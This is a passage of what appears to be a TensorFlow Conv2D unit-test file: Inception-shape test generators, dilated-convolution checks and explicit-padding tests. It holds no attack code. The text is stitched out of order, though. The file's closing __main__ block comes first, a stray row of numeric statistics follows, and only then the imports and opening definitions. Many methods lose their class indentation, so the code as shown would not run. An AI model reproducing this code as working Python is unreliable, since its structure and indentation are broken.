  """Returns a filter-gradient test method for the given Inception shape.

  The returned function relies on Conv2DTest's _CompareBackFilter helper.
  """

  def Test(self):
    if gpu_only and not test.is_gpu_available():
      tf_logging.info("Skipping InceptionBackFilter %s",
                      (input_size, filter_size, output_size, strides, padding))
      return
    tf_logging.info("Testing InceptionBackFilter %s",
                    (input_size, filter_size, output_size, strides, padding))
    self._CompareBackFilter(input_size, filter_size, output_size, strides,
                            padding)

  return Test
if __name__ == "__main__":
  # Dynamically attach one fwd/dilated/back-input/back-filter test per shrunk
  # Inception shape to Conv2DTest before handing control to the test runner.
  for index, (input_size_, filter_size_, output_size_, stride_,
              padding_) in enumerate(GetShrunkInceptionShapes()):
    setattr(Conv2DTest, "testInceptionFwd_" + str(index),
            test_util.run_in_graph_and_eager_modes(
                GetInceptionFwdTest(input_size_, filter_size_, stride_,
                                    padding_)))
    setattr(
        Conv2DTest, "testInceptionFwdDilatedConv_" + str(index),
        test_util.run_in_graph_and_eager_modes(GetInceptionFwdDilatedConvTest(
            input_size_, filter_size_, stride_, padding_)))
    setattr(Conv2DTest, "testInceptionBackInput_" + str(index),
            test_util.run_in_graph_and_eager_modes(
                GetInceptionBackInputTest(input_size_, filter_size_,
                                          output_size_, stride_, padding_)))
    setattr(Conv2DTest, "testInceptionBackFilter_" + str(index),
            test_util.run_in_graph_and_eager_modes(
                GetInceptionBackFilterTest(input_size_, filter_size_,
                                           output_size_, [stride_, stride_],
                                           padding_)))
  # TODO(b/35359731)
  # Fwd, BckInput, and BackFilter to test that for certain input parameter
  # set, winograd nonfused algorithm will be excluded from conv autotune. If
  # in such case, winograd nonfused algorithm is added as one option of the
  # conv autotune, and cuDNN version is smaller than 7, the following tests
  # will fail.
  ishape = [1, 400, 400, 1]
  fshape = [1, 1, 1, 256]
  oshape = [1, 400, 400, 256]
  setattr(Conv2DTest, "testInceptionFwd_No_Winograd_Nonfused",
          test_util.run_in_graph_and_eager_modes(
              GetInceptionFwdTest(ishape, fshape, 1, "SAME", gpu_only=True)))
  setattr(Conv2DTest, "testInceptionFwdDilatedConv_No_Winograd_Nonfused",
          test_util.run_in_graph_and_eager_modes(
              GetInceptionFwdDilatedConvTest(ishape, fshape, 1, "SAME")))
  setattr(Conv2DTest, "testInceptionBackInput_No_Winograd_Nonfused",
          test_util.run_in_graph_and_eager_modes(
              GetInceptionBackInputTest(ishape, fshape, oshape, 1, "SAME",
                                        gpu_only=True)))
  setattr(Conv2DTest, "testInceptionBackFilter_No_Winograd_Nonfused",
          test_util.run_in_graph_and_eager_modes(
              GetInceptionBackFilterTest(ishape, fshape, oshape, [1, 1], "SAME",
                                         gpu_only=True)))
  test.main()
| 36.964997 | 115 | 0.588513 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
import numpy as np
from six.moves import xrange
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.layers import convolutional
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import nn_impl
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
import tensorflow.python.ops.nn_grad
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.util.compat import collections_abc
def GetShrunkInceptionShapes(shrink=10):
  """Iterator over depth-shrunk Inception convolution shapes.

  Each yielded depth dimension is the corresponding Inception value divided
  (floor) by `shrink`.

  Args:
    shrink: Factor by which each depth value is shrunk relative to Inception.

  Yields:
    Tuple (input_size, filter_size, out_size, stride, padding) — the
    parameters of one Inception convolution layer.
  """
  input_sizes = [[4, 5, 5, 1248], [4, 8, 8, 384], [4, 8, 8, 384],
                 [4, 8, 8, 2048], [4, 8, 8, 448], [4, 8, 8, 2048],
                 [4, 8, 8, 2048], [4, 8, 8, 2048], [4, 8, 8, 1760],
                 [4, 8, 8, 1760], [4, 8, 8, 1760], [4, 8, 8, 1760],
                 [4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 1248],
                 [4, 17, 17, 128], [4, 17, 17, 1248], [4, 17, 17, 224],
                 [4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 1216],
                 [4, 17, 17, 1216], [4, 17, 17, 224], [4, 17, 17, 192],
                 [4, 17, 17, 192], [4, 17, 17, 1152], [4, 17, 17, 1152],
                 [4, 17, 17, 192], [4, 17, 17, 160], [4, 17, 17, 1152],
                 [4, 17, 17, 1024], [4, 17, 17, 128], [4, 17, 17, 1024],
                 [4, 17, 17, 128], [4, 17, 17, 1024], [4, 17, 17, 128],
                 [4, 17, 17, 768], [4, 17, 17, 128], [4, 17, 17, 128],
                 [4, 17, 17, 768], [4, 17, 17, 768], [4, 35, 35, 96],
                 [4, 35, 35, 288], [4, 35, 35, 64], [4, 35, 35, 288],
                 [4, 35, 35, 256], [4, 35, 35, 48], [4, 35, 35, 256],
                 [4, 35, 35, 96], [4, 35, 35, 192], [4, 35, 35, 192],
                 [4, 35, 35, 192], [4, 73, 73, 64], [4, 73, 73, 64],
                 [4, 147, 147, 24]]
  filter_sizes = [[1, 1, 1248, 128], [1, 3, 384, 384], [3, 1, 384, 384],
                  [1, 1, 2048, 192], [3, 3, 448, 384], [1, 1, 2048, 320],
                  [1, 1, 2048, 448], [1, 1, 2048, 384], [1, 1, 1760, 384],
                  [1, 1, 1760, 192], [1, 1, 1760, 448], [1, 1, 1760, 320],
                  [3, 3, 192, 192], [3, 3, 192, 192], [1, 1, 1248, 192],
                  [3, 3, 128, 320], [1, 1, 1248, 128], [1, 3, 224, 224],
                  [3, 1, 192, 256], [1, 3, 192, 256], [1, 1, 1216, 192],
                  [1, 1, 1216, 96], [3, 1, 224, 224], [3, 3, 192, 224],
                  [1, 3, 192, 192], [1, 1, 1152, 192], [1, 1, 1152, 128],
                  [3, 1, 192, 192], [3, 3, 160, 192], [1, 1, 1152, 160],
                  [1, 1, 1024, 128], [1, 3, 128, 192], [1, 1, 1024, 160],
                  [3, 1, 128, 192], [1, 1, 1024, 256], [3, 1, 128, 128],
                  [1, 1, 768, 192], [1, 3, 128, 128], [3, 3, 128, 128],
                  [1, 1, 768, 128], [1, 1, 768, 320], [3, 3, 96, 96],
                  [3, 3, 288, 384], [3, 3, 64, 96], [1, 1, 288, 64],
                  [1, 1, 256, 64], [5, 5, 48, 64], [1, 1, 256, 48],
                  [3, 3, 96, 96], [1, 1, 192, 32], [1, 1, 192, 64],
                  [1, 1, 192, 48], [3, 3, 64, 192], [1, 1, 64, 64],
                  [1, 1, 24, 64]]
  out_sizes = [[4, 5, 5, 128], [4, 8, 8, 384], [4, 8, 8, 384],
               [4, 8, 8, 192], [4, 8, 8, 384], [4, 8, 8, 320],
               [4, 8, 8, 448], [4, 8, 8, 384], [4, 8, 8, 384],
               [4, 8, 8, 192], [4, 8, 8, 448], [4, 8, 8, 320],
               [4, 8, 8, 192], [4, 17, 17, 192], [4, 17, 17, 192],
               [4, 8, 8, 320], [4, 17, 17, 128], [4, 17, 17, 224],
               [4, 17, 17, 256], [4, 17, 17, 256], [4, 17, 17, 192],
               [4, 17, 17, 96], [4, 17, 17, 224], [4, 17, 17, 224],
               [4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 128],
               [4, 17, 17, 192], [4, 17, 17, 192], [4, 17, 17, 160],
               [4, 17, 17, 128], [4, 17, 17, 192], [4, 17, 17, 160],
               [4, 17, 17, 192], [4, 17, 17, 256], [4, 17, 17, 128],
               [4, 17, 17, 192], [4, 17, 17, 128], [4, 17, 17, 128],
               [4, 17, 17, 128], [4, 17, 17, 320], [4, 17, 17, 96],
               [4, 17, 17, 384], [4, 35, 35, 96], [4, 35, 35, 64],
               [4, 35, 35, 64], [4, 35, 35, 64], [4, 35, 35, 48],
               [4, 35, 35, 96], [4, 35, 35, 32], [4, 35, 35, 64],
               [4, 35, 35, 48], [4, 71, 71, 192], [4, 73, 73, 64],
               [4, 147, 147, 64]]
  strides = [
      1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1,
      1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1,
      1, 1, 1, 1, 1
  ]
  # Shrink each depth value in place.
  for i in input_sizes:
    i[3] //= shrink
  for f in filter_sizes:
    f[2] //= shrink
    f[3] //= shrink
  for o in out_sizes:
    o[3] //= shrink
  VALID = "VALID"
  SAME = "SAME"
  paddings = [
      SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME,
      VALID, SAME, SAME, VALID, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME,
      SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME, SAME,
      SAME, SAME, SAME, SAME, SAME, VALID, VALID, SAME, SAME, SAME, SAME, SAME,
      SAME, SAME, SAME, SAME, VALID, VALID, VALID
  ]
  for i, f, o, s, p in zip(input_sizes, filter_sizes, out_sizes, strides,
                           paddings):
    yield i, f, o, s, p
def GetTestConfigs():
  """Returns the (data_format, use_gpu) configs to exercise.

  Returns:
    A list of (data_format, use_gpu) tuples; NCHW is included only when a
    CUDA GPU is available.
  """
  configs = [("NHWC", False), ("NHWC", True)]
  if test.is_gpu_available(cuda_only=True):
    configs.append(("NCHW", True))
  return configs
class Conv2DTest(test.TestCase):
def _DtypesToTest(self, use_gpu):
optional_float64 = [] if test.is_built_with_rocm() else [dtypes.float64]
if use_gpu and not test_util.GpuSupportsHalfMatMulAndConv():
return [dtypes.float32] + optional_float64
else:
return [dtypes.float32, dtypes.float16] + optional_float64
def _CreateNumpyTensor(self, shape):
total_size = 1
for s in shape:
total_size *= s
return np.arange(1, total_size + 1, dtype=np.float32).reshape(shape)
  def _SetupValuesForDevice(self, tensor_in_sizes, filter_in_sizes, dilations,
                            strides, padding, data_format, dtype, use_gpu):
    """Builds a Conv2D op on the requested device and returns its NHWC output.

    Args:
      tensor_in_sizes: Input dimensions [batch, rows, cols, depth].
      filter_in_sizes: Filter dimensions [k_rows, k_cols, in_depth, out_depth].
      dilations: [row_dilation, col_dilation].
      strides: [row_stride, col_stride].
      padding: Padding type string, or a list/tuple of explicit paddings for
        the spatial dimensions only (batch/depth pairs are added here).
      data_format: "NHWC" or "NCHW"; inputs are transposed as needed.
      dtype: Data type for inputs and outputs.
      use_gpu: Whether to place the ops on GPU.

    Returns:
      The conv output tensor, converted back to NHWC when data_format is NCHW.
    """
    x1 = self._CreateNumpyTensor(tensor_in_sizes)
    x2 = self._CreateNumpyTensor(filter_in_sizes)

    with test_util.device(use_gpu):
      t1 = constant_op.constant(x1, shape=tensor_in_sizes, dtype=dtype)
      t2 = constant_op.constant(x2, shape=filter_in_sizes, dtype=dtype)
      strides = [1] + strides + [1]
      dilations = [1] + dilations + [1]
      if isinstance(padding, (list, tuple)):
        # Pad the explicit padding list with no-op pairs for batch and depth.
        padding = [(0, 0)] + padding + [(0, 0)]
      if data_format == "NCHW":
        t1 = test_util.NHWCToNCHW(t1)
        strides = test_util.NHWCToNCHW(strides)
        dilations = test_util.NHWCToNCHW(dilations)
        if isinstance(padding, (list, tuple)):
          padding = test_util.NHWCToNCHW(padding)
      conv = nn_ops.conv2d(
          t1,
          t2,
          dilations=dilations,
          strides=strides,
          padding=padding,
          data_format=data_format)
      self.assertEqual(conv.dtype, dtype)
      if data_format == "NCHW":
        conv = test_util.NCHWToNHWC(conv)

      return conv
  def _CompareFwdValues(self, tensor_in_sizes, filter_in_sizes, conv_strides,
                        padding):
    """Checks that all (data_format, use_gpu) configs agree on random input.

    The first config's output is used as the reference for all others.
    """
    x1 = np.random.rand(*tensor_in_sizes).astype(np.float32)
    x2 = np.random.rand(*filter_in_sizes).astype(np.float32)

    def _SetupVal(data_format, use_gpu):
      # Builds the conv for one config, converting layout where needed.
      with test_util.device(use_gpu):
        t1 = constant_op.constant(x1, shape=tensor_in_sizes)
        t2 = constant_op.constant(x2, shape=filter_in_sizes)
        strides = [1] + conv_strides + [1]
        if data_format == "NCHW":
          t1 = test_util.NHWCToNCHW(t1)
          strides = test_util.NHWCToNCHW(strides)
        conv = nn_ops.conv2d(
            t1, t2, strides=strides, padding=padding, data_format=data_format)
        if data_format == "NCHW":
          conv = test_util.NCHWToNHWC(conv)

        return conv

    tensors = []
    for (data_format, use_gpu) in GetTestConfigs():
      tensors.append(_SetupVal(data_format, use_gpu))
    values = self.evaluate(tensors)
    for i in range(1, len(values)):
      self.assertAllClose(values[0], values[i], rtol=1e-3, atol=1e-3)
  def _ComputeReferenceDilatedConv(self, tensor_in_sizes, filter_in_sizes,
                                   stride, dilation, padding, data_format,
                                   use_gpu):
    """Builds both reference (nn_ops.convolution) and dilated conv2d outputs.

    Args:
      tensor_in_sizes: Input dimensions [batch, rows, cols, depth].
      filter_in_sizes: Filter dimensions [k_rows, k_cols, in_depth, out_depth].
      stride: A scalar or an iterable [row_stride, col_stride].
      dilation: [row_dilation, col_dilation].
      padding: Padding type.
      data_format: "NHWC" or "NCHW".
      use_gpu: Whether to place the ops on GPU.

    Returns:
      Tuple (expected, computed) tensors, both converted to NHWC.
    """
    x1 = self._CreateNumpyTensor(tensor_in_sizes)
    x2 = self._CreateNumpyTensor(filter_in_sizes)
    with test_util.device(use_gpu):
      t1 = constant_op.constant(x1, shape=tensor_in_sizes)
      t2 = constant_op.constant(x2, shape=filter_in_sizes)
      if isinstance(stride, collections_abc.Iterable):
        strides = list(stride)
      else:
        strides = [stride, stride]
      if data_format == "NCHW":
        t1 = test_util.NHWCToNCHW(t1)
        full_strides = [1, 1] + strides
        full_dilation = [1, 1] + dilation
      else:
        full_strides = [1] + strides + [1]
        full_dilation = [1] + dilation + [1]
      # Reference path: nn_ops.convolution takes 2-element strides/dilations.
      expected = nn_ops.convolution(
          t1,
          t2,
          padding=padding,
          strides=strides,
          dilation_rate=dilation,
          data_format=data_format)
      # Path under test: nn_ops.conv2d takes full 4-element strides/dilations.
      computed = nn_ops.conv2d(
          t1,
          t2,
          strides=full_strides,
          dilations=full_dilation,
          padding=padding,
          data_format=data_format)
      if data_format == "NCHW":
        expected = test_util.NCHWToNHWC(expected)
        computed = test_util.NCHWToNHWC(computed)
    return expected, computed
  def _VerifyDilatedConvValues(self, tensor_in_sizes, filter_in_sizes, strides,
                               padding, dilations, rtol=1e-4):
    """Compares dilated conv2d against the nn_ops.convolution reference.

    Runs every (data_format, use_gpu) config and asserts the two paths agree.
    """
    expected_results = []
    computed_results = []
    for data_format, use_gpu in GetTestConfigs():
      expected, computed = self._ComputeReferenceDilatedConv(
          tensor_in_sizes, filter_in_sizes, strides, dilations, padding,
          data_format, use_gpu)
      expected_results.append(expected)
      computed_results.append(computed)
      # NOTE(review): `tolerance` ends up holding the value from the *last*
      # config in the loop, and is then applied to every comparison below —
      # looks unintentional; confirm before relying on per-config tolerances.
      tolerance = 1e-2 if use_gpu else 1e-5
    expected_values = self.evaluate(expected_results)
    computed_values = self.evaluate(computed_results)
    for e_value, c_value in zip(expected_values, computed_values):
      tf_logging.debug("expected = %s", e_value)
      tf_logging.debug("actual = %s", c_value)
      self.assertAllClose(
          e_value.flatten(), c_value.flatten(), atol=tolerance, rtol=rtol)
  def _VerifyValues(self,
                    tensor_in_sizes,
                    filter_in_sizes,
                    strides,
                    padding,
                    expected,
                    dilations=(1, 1),
                    gpu_only=False,
                    test_grappler_layout_optimizer=False,
                    tol=1e-5,
                    fp16_tol=1e-3):
    """Runs Conv2D over all configs/dtypes and checks against `expected`.

    Args:
      tensor_in_sizes: Input dimensions [batch, rows, cols, depth].
      filter_in_sizes: Filter dimensions [k_rows, k_cols, in_depth, out_depth].
      strides: [row_stride, col_stride].
      padding: Padding type string or explicit padding list.
      expected: Flat list of expected output values.
      dilations: [row_dilation, col_dilation].
      gpu_only: If True, skip entirely without a CUDA GPU and skip CPU configs.
      test_grappler_layout_optimizer: If True, append an identity op on NHWC
        GPU results so Grappler's layout optimizer can rewrite the Conv2D.
      tol: Absolute/relative tolerance for non-fp16 dtypes.
      fp16_tol: Absolute/relative tolerance for fp16.
    """
    if gpu_only and not test.is_gpu_available(cuda_only=True):
      return
    tensors = []
    dilations = list(dilations)
    for (data_format, use_gpu) in GetTestConfigs():
      if gpu_only and not use_gpu:
        continue
      dtypes_to_test = self._DtypesToTest(use_gpu)
      if not test_grappler_layout_optimizer and data_format == "NHWC":
        # int32 conv is only exercised on the plain NHWC path.
        dtypes_to_test.append(dtypes.int32)
      for dtype in dtypes_to_test:
        result = self._SetupValuesForDevice(
            tensor_in_sizes,
            filter_in_sizes,
            dilations,
            strides,
            padding,
            data_format,
            dtype,
            use_gpu=use_gpu)
        if test_grappler_layout_optimizer and data_format == "NHWC" and use_gpu:
          # this identity allows Grappler to optimize the Conv2D node.
          result = array_ops.identity(result)
        tensors.append(result)
      values = self.evaluate(tensors)
      for i in range(len(tensors)):
        conv = tensors[i]
        value = values[i]
        tf_logging.debug("expected = %s", expected)
        tf_logging.debug("actual = %s", value)
        tol_to_use = fp16_tol if value.dtype == np.float16 else tol
        if np.issubdtype(value.dtype, np.integer):
          self.assertAllEqual(np.rint(expected), np.ravel(value))
        else:
          self.assertAllClose(expected, np.ravel(value), atol=tol_to_use,
                              rtol=tol_to_use)
        self.assertShapeEqual(value, conv)
        self.assertEqual(value.dtype, conv.dtype.as_numpy_dtype)
  def _VerifyExplicitPaddings(self,
                              tensor_in_sizes,
                              filter_in_sizes,
                              strides,
                              padding,
                              dilations=(1, 1),
                              test_grappler_layout_optimizer=False,
                              tol=1e-5,
                              fp16_tol=1e-3):
    """Checks explicit padding against manually padding + VALID conv.

    The expected values are computed by padding the input with array_ops.pad
    and running conv2d with "VALID" padding, then _VerifyValues is called with
    the explicit `padding` list over all configs.
    """
    input_tensor = self._CreateNumpyTensor(tensor_in_sizes)
    filter_tensor = self._CreateNumpyTensor(filter_in_sizes)
    input_tensor = array_ops.pad(input_tensor, [(0, 0)] + padding + [(0, 0)])
    dilations = list(dilations)
    conv2d_result = nn_ops.conv2d(
        input_tensor,
        filter_tensor, [1] + list(strides) + [1],
        "VALID",
        dilations=[1] + dilations + [1])
    expected = list(self.evaluate(array_ops.reshape(conv2d_result, [-1])))
    self._VerifyValues(
        tensor_in_sizes,
        filter_in_sizes,
        strides,
        padding,
        expected,
        dilations,
        test_grappler_layout_optimizer=test_grappler_layout_optimizer,
        tol=tol,
        fp16_tol=fp16_tol)
  @test_util.run_in_graph_and_eager_modes
  def testConv2D1x1Filter(self):
    """1x1 filter, stride 1, VALID padding, against precomputed outputs."""
    expected_output = [
        30.0, 36.0, 42.0, 66.0, 81.0, 96.0, 102.0, 126.0, 150.0, 138.0, 171.0,
        204.0, 174.0, 216.0, 258.0, 210.0, 261.0, 312.0
    ]
    self._VerifyValues(
        tensor_in_sizes=[1, 2, 3, 3],
        filter_in_sizes=[1, 1, 3, 3],
        strides=[1, 1],
        padding="VALID",
        expected=expected_output)
  @test_util.run_in_graph_and_eager_modes
  def testConv2DExpandedBatch(self):
    """conv2d with batch reshaped into two leading dims matches flat batch."""
    tensor_in_sizes_batch = [10, 2, 3, 3]
    tensor_in_sizes_expanded_batch = [2, 5, 2, 3, 3]
    filter_in_sizes = [1, 1, 3, 3]
    filter_in = self._CreateNumpyTensor(filter_in_sizes)
    x1 = self._CreateNumpyTensor(tensor_in_sizes_batch)
    x2 = x1.reshape(tensor_in_sizes_expanded_batch)
    conv1 = nn_ops.conv2d(
        x1,
        filter_in,
        strides=[1, 1],
        padding="VALID")
    conv2 = nn_ops.conv2d(
        x2,
        filter_in,
        strides=[1, 1],
        padding="VALID")
    self.assertEqual(conv1.shape, tensor_in_sizes_batch)
    self.assertEqual(conv2.shape, tensor_in_sizes_expanded_batch)
    self.assertAllEqual(
        conv1,
        self.evaluate(conv2).reshape(conv1.shape))
  @test_util.run_in_graph_and_eager_modes
  def testConvolutionClass2DExpandedBatch(self):
    """nn_ops.Convolution handles 1 vs. 2 batch dims with equal results."""
    tensor_in_sizes_batch = [10, 2, 3, 3]
    tensor_in_sizes_expanded_batch = [2, 5, 2, 3, 3]
    filter_in_sizes = [1, 1, 3, 3]
    filter_in = self._CreateNumpyTensor(filter_in_sizes)
    x1 = self._CreateNumpyTensor(tensor_in_sizes_batch)
    x2 = x1.reshape(tensor_in_sizes_expanded_batch)
    convolver1 = nn_ops.Convolution(
        input_shape=x1.shape,
        filter_shape=filter_in.shape,
        strides=[1, 1],
        padding="VALID")
    self.assertEqual(convolver1.num_batch_dims, 1)
    convolver2 = nn_ops.Convolution(
        input_shape=x2.shape,
        filter_shape=filter_in.shape,
        strides=[1, 1],
        padding="VALID")
    self.assertEqual(convolver2.num_batch_dims, 2)
    conv1 = convolver1(x1, filter_in)
    conv2 = convolver2(x2, filter_in)
    self.assertEqual(conv1.shape, tensor_in_sizes_batch)
    self.assertEqual(conv2.shape, tensor_in_sizes_expanded_batch)
    self.assertAllEqual(
        conv1,
        self.evaluate(conv2).reshape(conv1.shape))
  @test_util.run_in_graph_and_eager_modes
  def testConvolutionWith2SpatialDimensionsAndExpandedBatch(self):
    """nn_ops.convolution handles 1 vs. 2 batch dims with equal results."""
    tensor_in_sizes_batch = [10, 2, 3, 3]
    tensor_in_sizes_expanded_batch = [2, 5, 2, 3, 3]
    filter_in_sizes = [1, 1, 3, 3]
    filter_in = self._CreateNumpyTensor(filter_in_sizes)
    x1 = self._CreateNumpyTensor(tensor_in_sizes_batch)
    x2 = x1.reshape(tensor_in_sizes_expanded_batch)
    conv1 = nn_ops.convolution(
        x1,
        filter_in,
        strides=[1, 1],
        padding="VALID")
    conv2 = nn_ops.convolution(
        x2,
        filter_in,
        strides=[1, 1],
        padding="VALID")
    self.assertEqual(conv1.shape, tensor_in_sizes_batch)
    self.assertEqual(conv2.shape, tensor_in_sizes_expanded_batch)
    self.assertAllEqual(
        conv1,
        self.evaluate(conv2).reshape(conv1.shape))
  @test_util.run_in_graph_and_eager_modes
  def testConv2D2x2Filter2x1Dilation(self):
    """2x2 filter with asymmetric 2x1 dilation, VALID padding."""
    self._VerifyDilatedConvValues(
        tensor_in_sizes=[1, 4, 4, 1],
        filter_in_sizes=[2, 2, 1, 1],
        strides=[1, 1],
        dilations=[2, 1],
        padding="VALID")
  @test_util.run_in_graph_and_eager_modes
  def testConv2DEmpty(self):
    """Zero-batch input produces an empty output."""
    expected_output = []
    self._VerifyValues(
        tensor_in_sizes=[0, 2, 3, 3],
        filter_in_sizes=[1, 1, 3, 3],
        strides=[1, 1],
        padding="VALID",
        expected=expected_output)
  @test_util.run_in_graph_and_eager_modes
  def testConv2DEmptyDilation(self):
    """Zero-batch input with dilation still runs cleanly."""
    self._VerifyDilatedConvValues(
        tensor_in_sizes=[0, 2, 3, 3],
        filter_in_sizes=[1, 1, 3, 3],
        strides=[1, 1],
        dilations=[2, 1],
        padding="VALID")
  @test_util.run_in_graph_and_eager_modes
  def testConv2D2x2Filter(self):
    """2x2 filter, stride 1, VALID padding, against precomputed outputs."""
    # The outputs are computed using third_party/py/IPython/notebook.
    expected_output = [2271.0, 2367.0, 2463.0, 2901.0, 3033.0, 3165.0]
    self._VerifyValues(
        tensor_in_sizes=[1, 2, 3, 3],
        filter_in_sizes=[2, 2, 3, 3],
        strides=[1, 1],
        padding="VALID",
        expected=expected_output)
  @test_util.run_in_graph_and_eager_modes
  def testConv2D2x2FilterDilation(self):
    """2x2 filter with 1x2 dilation, VALID padding."""
    self._VerifyDilatedConvValues(
        tensor_in_sizes=[1, 2, 3, 3],
        filter_in_sizes=[2, 2, 3, 3],
        strides=[1, 1],
        dilations=[1, 2],
        padding="VALID")
  @test_util.run_in_graph_and_eager_modes
  def testConv2D1x2Filter(self):
    """1x2 filter, stride 1, VALID padding, against precomputed outputs."""
    # The outputs are computed using third_party/py/IPython/notebook.
    expected_output = [
        231.0, 252.0, 273.0, 384.0, 423.0, 462.0, 690.0, 765.0, 840.0, 843.0,
        936.0, 1029.0
    ]
    self._VerifyValues(
        tensor_in_sizes=[1, 2, 3, 3],
        filter_in_sizes=[1, 2, 3, 3],
        strides=[1, 1],
        padding="VALID",
        expected=expected_output)
  @test_util.run_in_graph_and_eager_modes
  def testConv2D1x2FilterDilation(self):
    """1x2 filter with 2x1 dilation, VALID padding."""
    self._VerifyDilatedConvValues(
        tensor_in_sizes=[1, 2, 3, 3],
        filter_in_sizes=[1, 2, 3, 3],
        strides=[1, 1],
        dilations=[2, 1],
        padding="VALID")
  @test_util.run_in_graph_and_eager_modes
  def testConv2D2x2FilterStride2(self):
    """2x2 filter, stride 2, VALID padding, against precomputed outputs."""
    expected_output = [2271.0, 2367.0, 2463.0]
    self._VerifyValues(
        tensor_in_sizes=[1, 2, 3, 3],
        filter_in_sizes=[2, 2, 3, 3],
        strides=[2, 2],
        padding="VALID",
        expected=expected_output)
  @test_util.run_in_graph_and_eager_modes
  def testConv2D2x2FilterStride2Same(self):
    """2x2 filter, stride 2, SAME padding, against precomputed outputs."""
    expected_output = [2271.0, 2367.0, 2463.0, 1230.0, 1305.0, 1380.0]
    self._VerifyValues(
        tensor_in_sizes=[1, 2, 3, 3],
        filter_in_sizes=[2, 2, 3, 3],
        strides=[2, 2],
        padding="SAME",
        expected=expected_output)
  @test_util.run_in_graph_and_eager_modes
  def testConv2D2x2FilterStride1x2(self):
    """2x2 filter with asymmetric 1x2 strides, VALID padding."""
    expected_output = [58.0, 78.0, 98.0, 118.0, 138.0, 158.0]
    self._VerifyValues(
        tensor_in_sizes=[1, 3, 6, 1],
        filter_in_sizes=[2, 2, 1, 1],
        strides=[1, 2],
        padding="VALID",
        expected=expected_output)
  @test_util.run_in_graph_and_eager_modes
  def testConv2DKernelSmallerThanStrideValid(self):
    """Kernel smaller than the stride, VALID padding."""
    expected_output = [65, 95, 275, 305]
    self._VerifyValues(
        tensor_in_sizes=[1, 7, 7, 1],
        filter_in_sizes=[2, 2, 1, 1],
        strides=[3, 3],
        padding="VALID",
        expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSmallerThanStrideSame(self):
self._VerifyValues(
tensor_in_sizes=[1, 3, 3, 1],
filter_in_sizes=[1, 1, 1, 1],
strides=[2, 2],
padding="SAME",
expected=[1, 3, 7, 9])
self._VerifyValues(
tensor_in_sizes=[1, 4, 4, 1],
filter_in_sizes=[1, 1, 1, 1],
strides=[2, 2],
padding="SAME",
expected=[1, 3, 9, 11])
self._VerifyValues(
tensor_in_sizes=[1, 4, 4, 1],
filter_in_sizes=[2, 2, 1, 1],
strides=[3, 3],
padding="SAME",
expected=[44, 28, 41, 16])
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSize(self):
self._VerifyValues(
tensor_in_sizes=[1, 2, 2, 1],
filter_in_sizes=[2, 2, 1, 2],
strides=[1, 1],
padding="VALID",
expected=[50, 60])
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSizeDilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[1, 3, 3, 1],
filter_in_sizes=[2, 2, 1, 2],
strides=[1, 1],
dilations=[2, 2],
padding="VALID")
@test_util.run_in_graph_and_eager_modes()
def testConv2D0x0Padding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[1, 1],
padding=[[0, 0], [0, 0]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[3, 4, 3, 2],
filter_in_sizes=[1, 1, 2, 1],
strides=[2, 2],
padding=[[0, 0], [0, 0]])
@test_util.run_in_graph_and_eager_modes()
def testConv2D1x1Padding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 2],
filter_in_sizes=[2, 2, 2, 2],
strides=[1, 1],
padding=[[1, 1], [1, 1]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 2, 1],
filter_in_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding=[[1, 1], [1, 1]])
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Padding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 1, 2],
filter_in_sizes=[2, 1, 2, 1],
strides=[1, 1],
padding=[[2, 2], [2, 2]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 1, 2],
filter_in_sizes=[1, 1, 2, 1],
strides=[2, 1],
padding=[[2, 2], [2, 2]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DOnlyBottomPadding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 2],
strides=[1, 1],
padding=[[0, 3], [0, 0]], tol=2e-5)
self._VerifyExplicitPaddings(
tensor_in_sizes=[2, 2, 4, 3],
filter_in_sizes=[1, 2, 3, 2],
strides=[2, 2],
padding=[[0, 3], [0, 0]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DOnlyTopRightPadding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 2],
strides=[1, 1],
padding=[[1, 0], [0, 2]],
tol=5e-5)
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 4, 2],
filter_in_sizes=[2, 2, 2, 2],
strides=[1, 3],
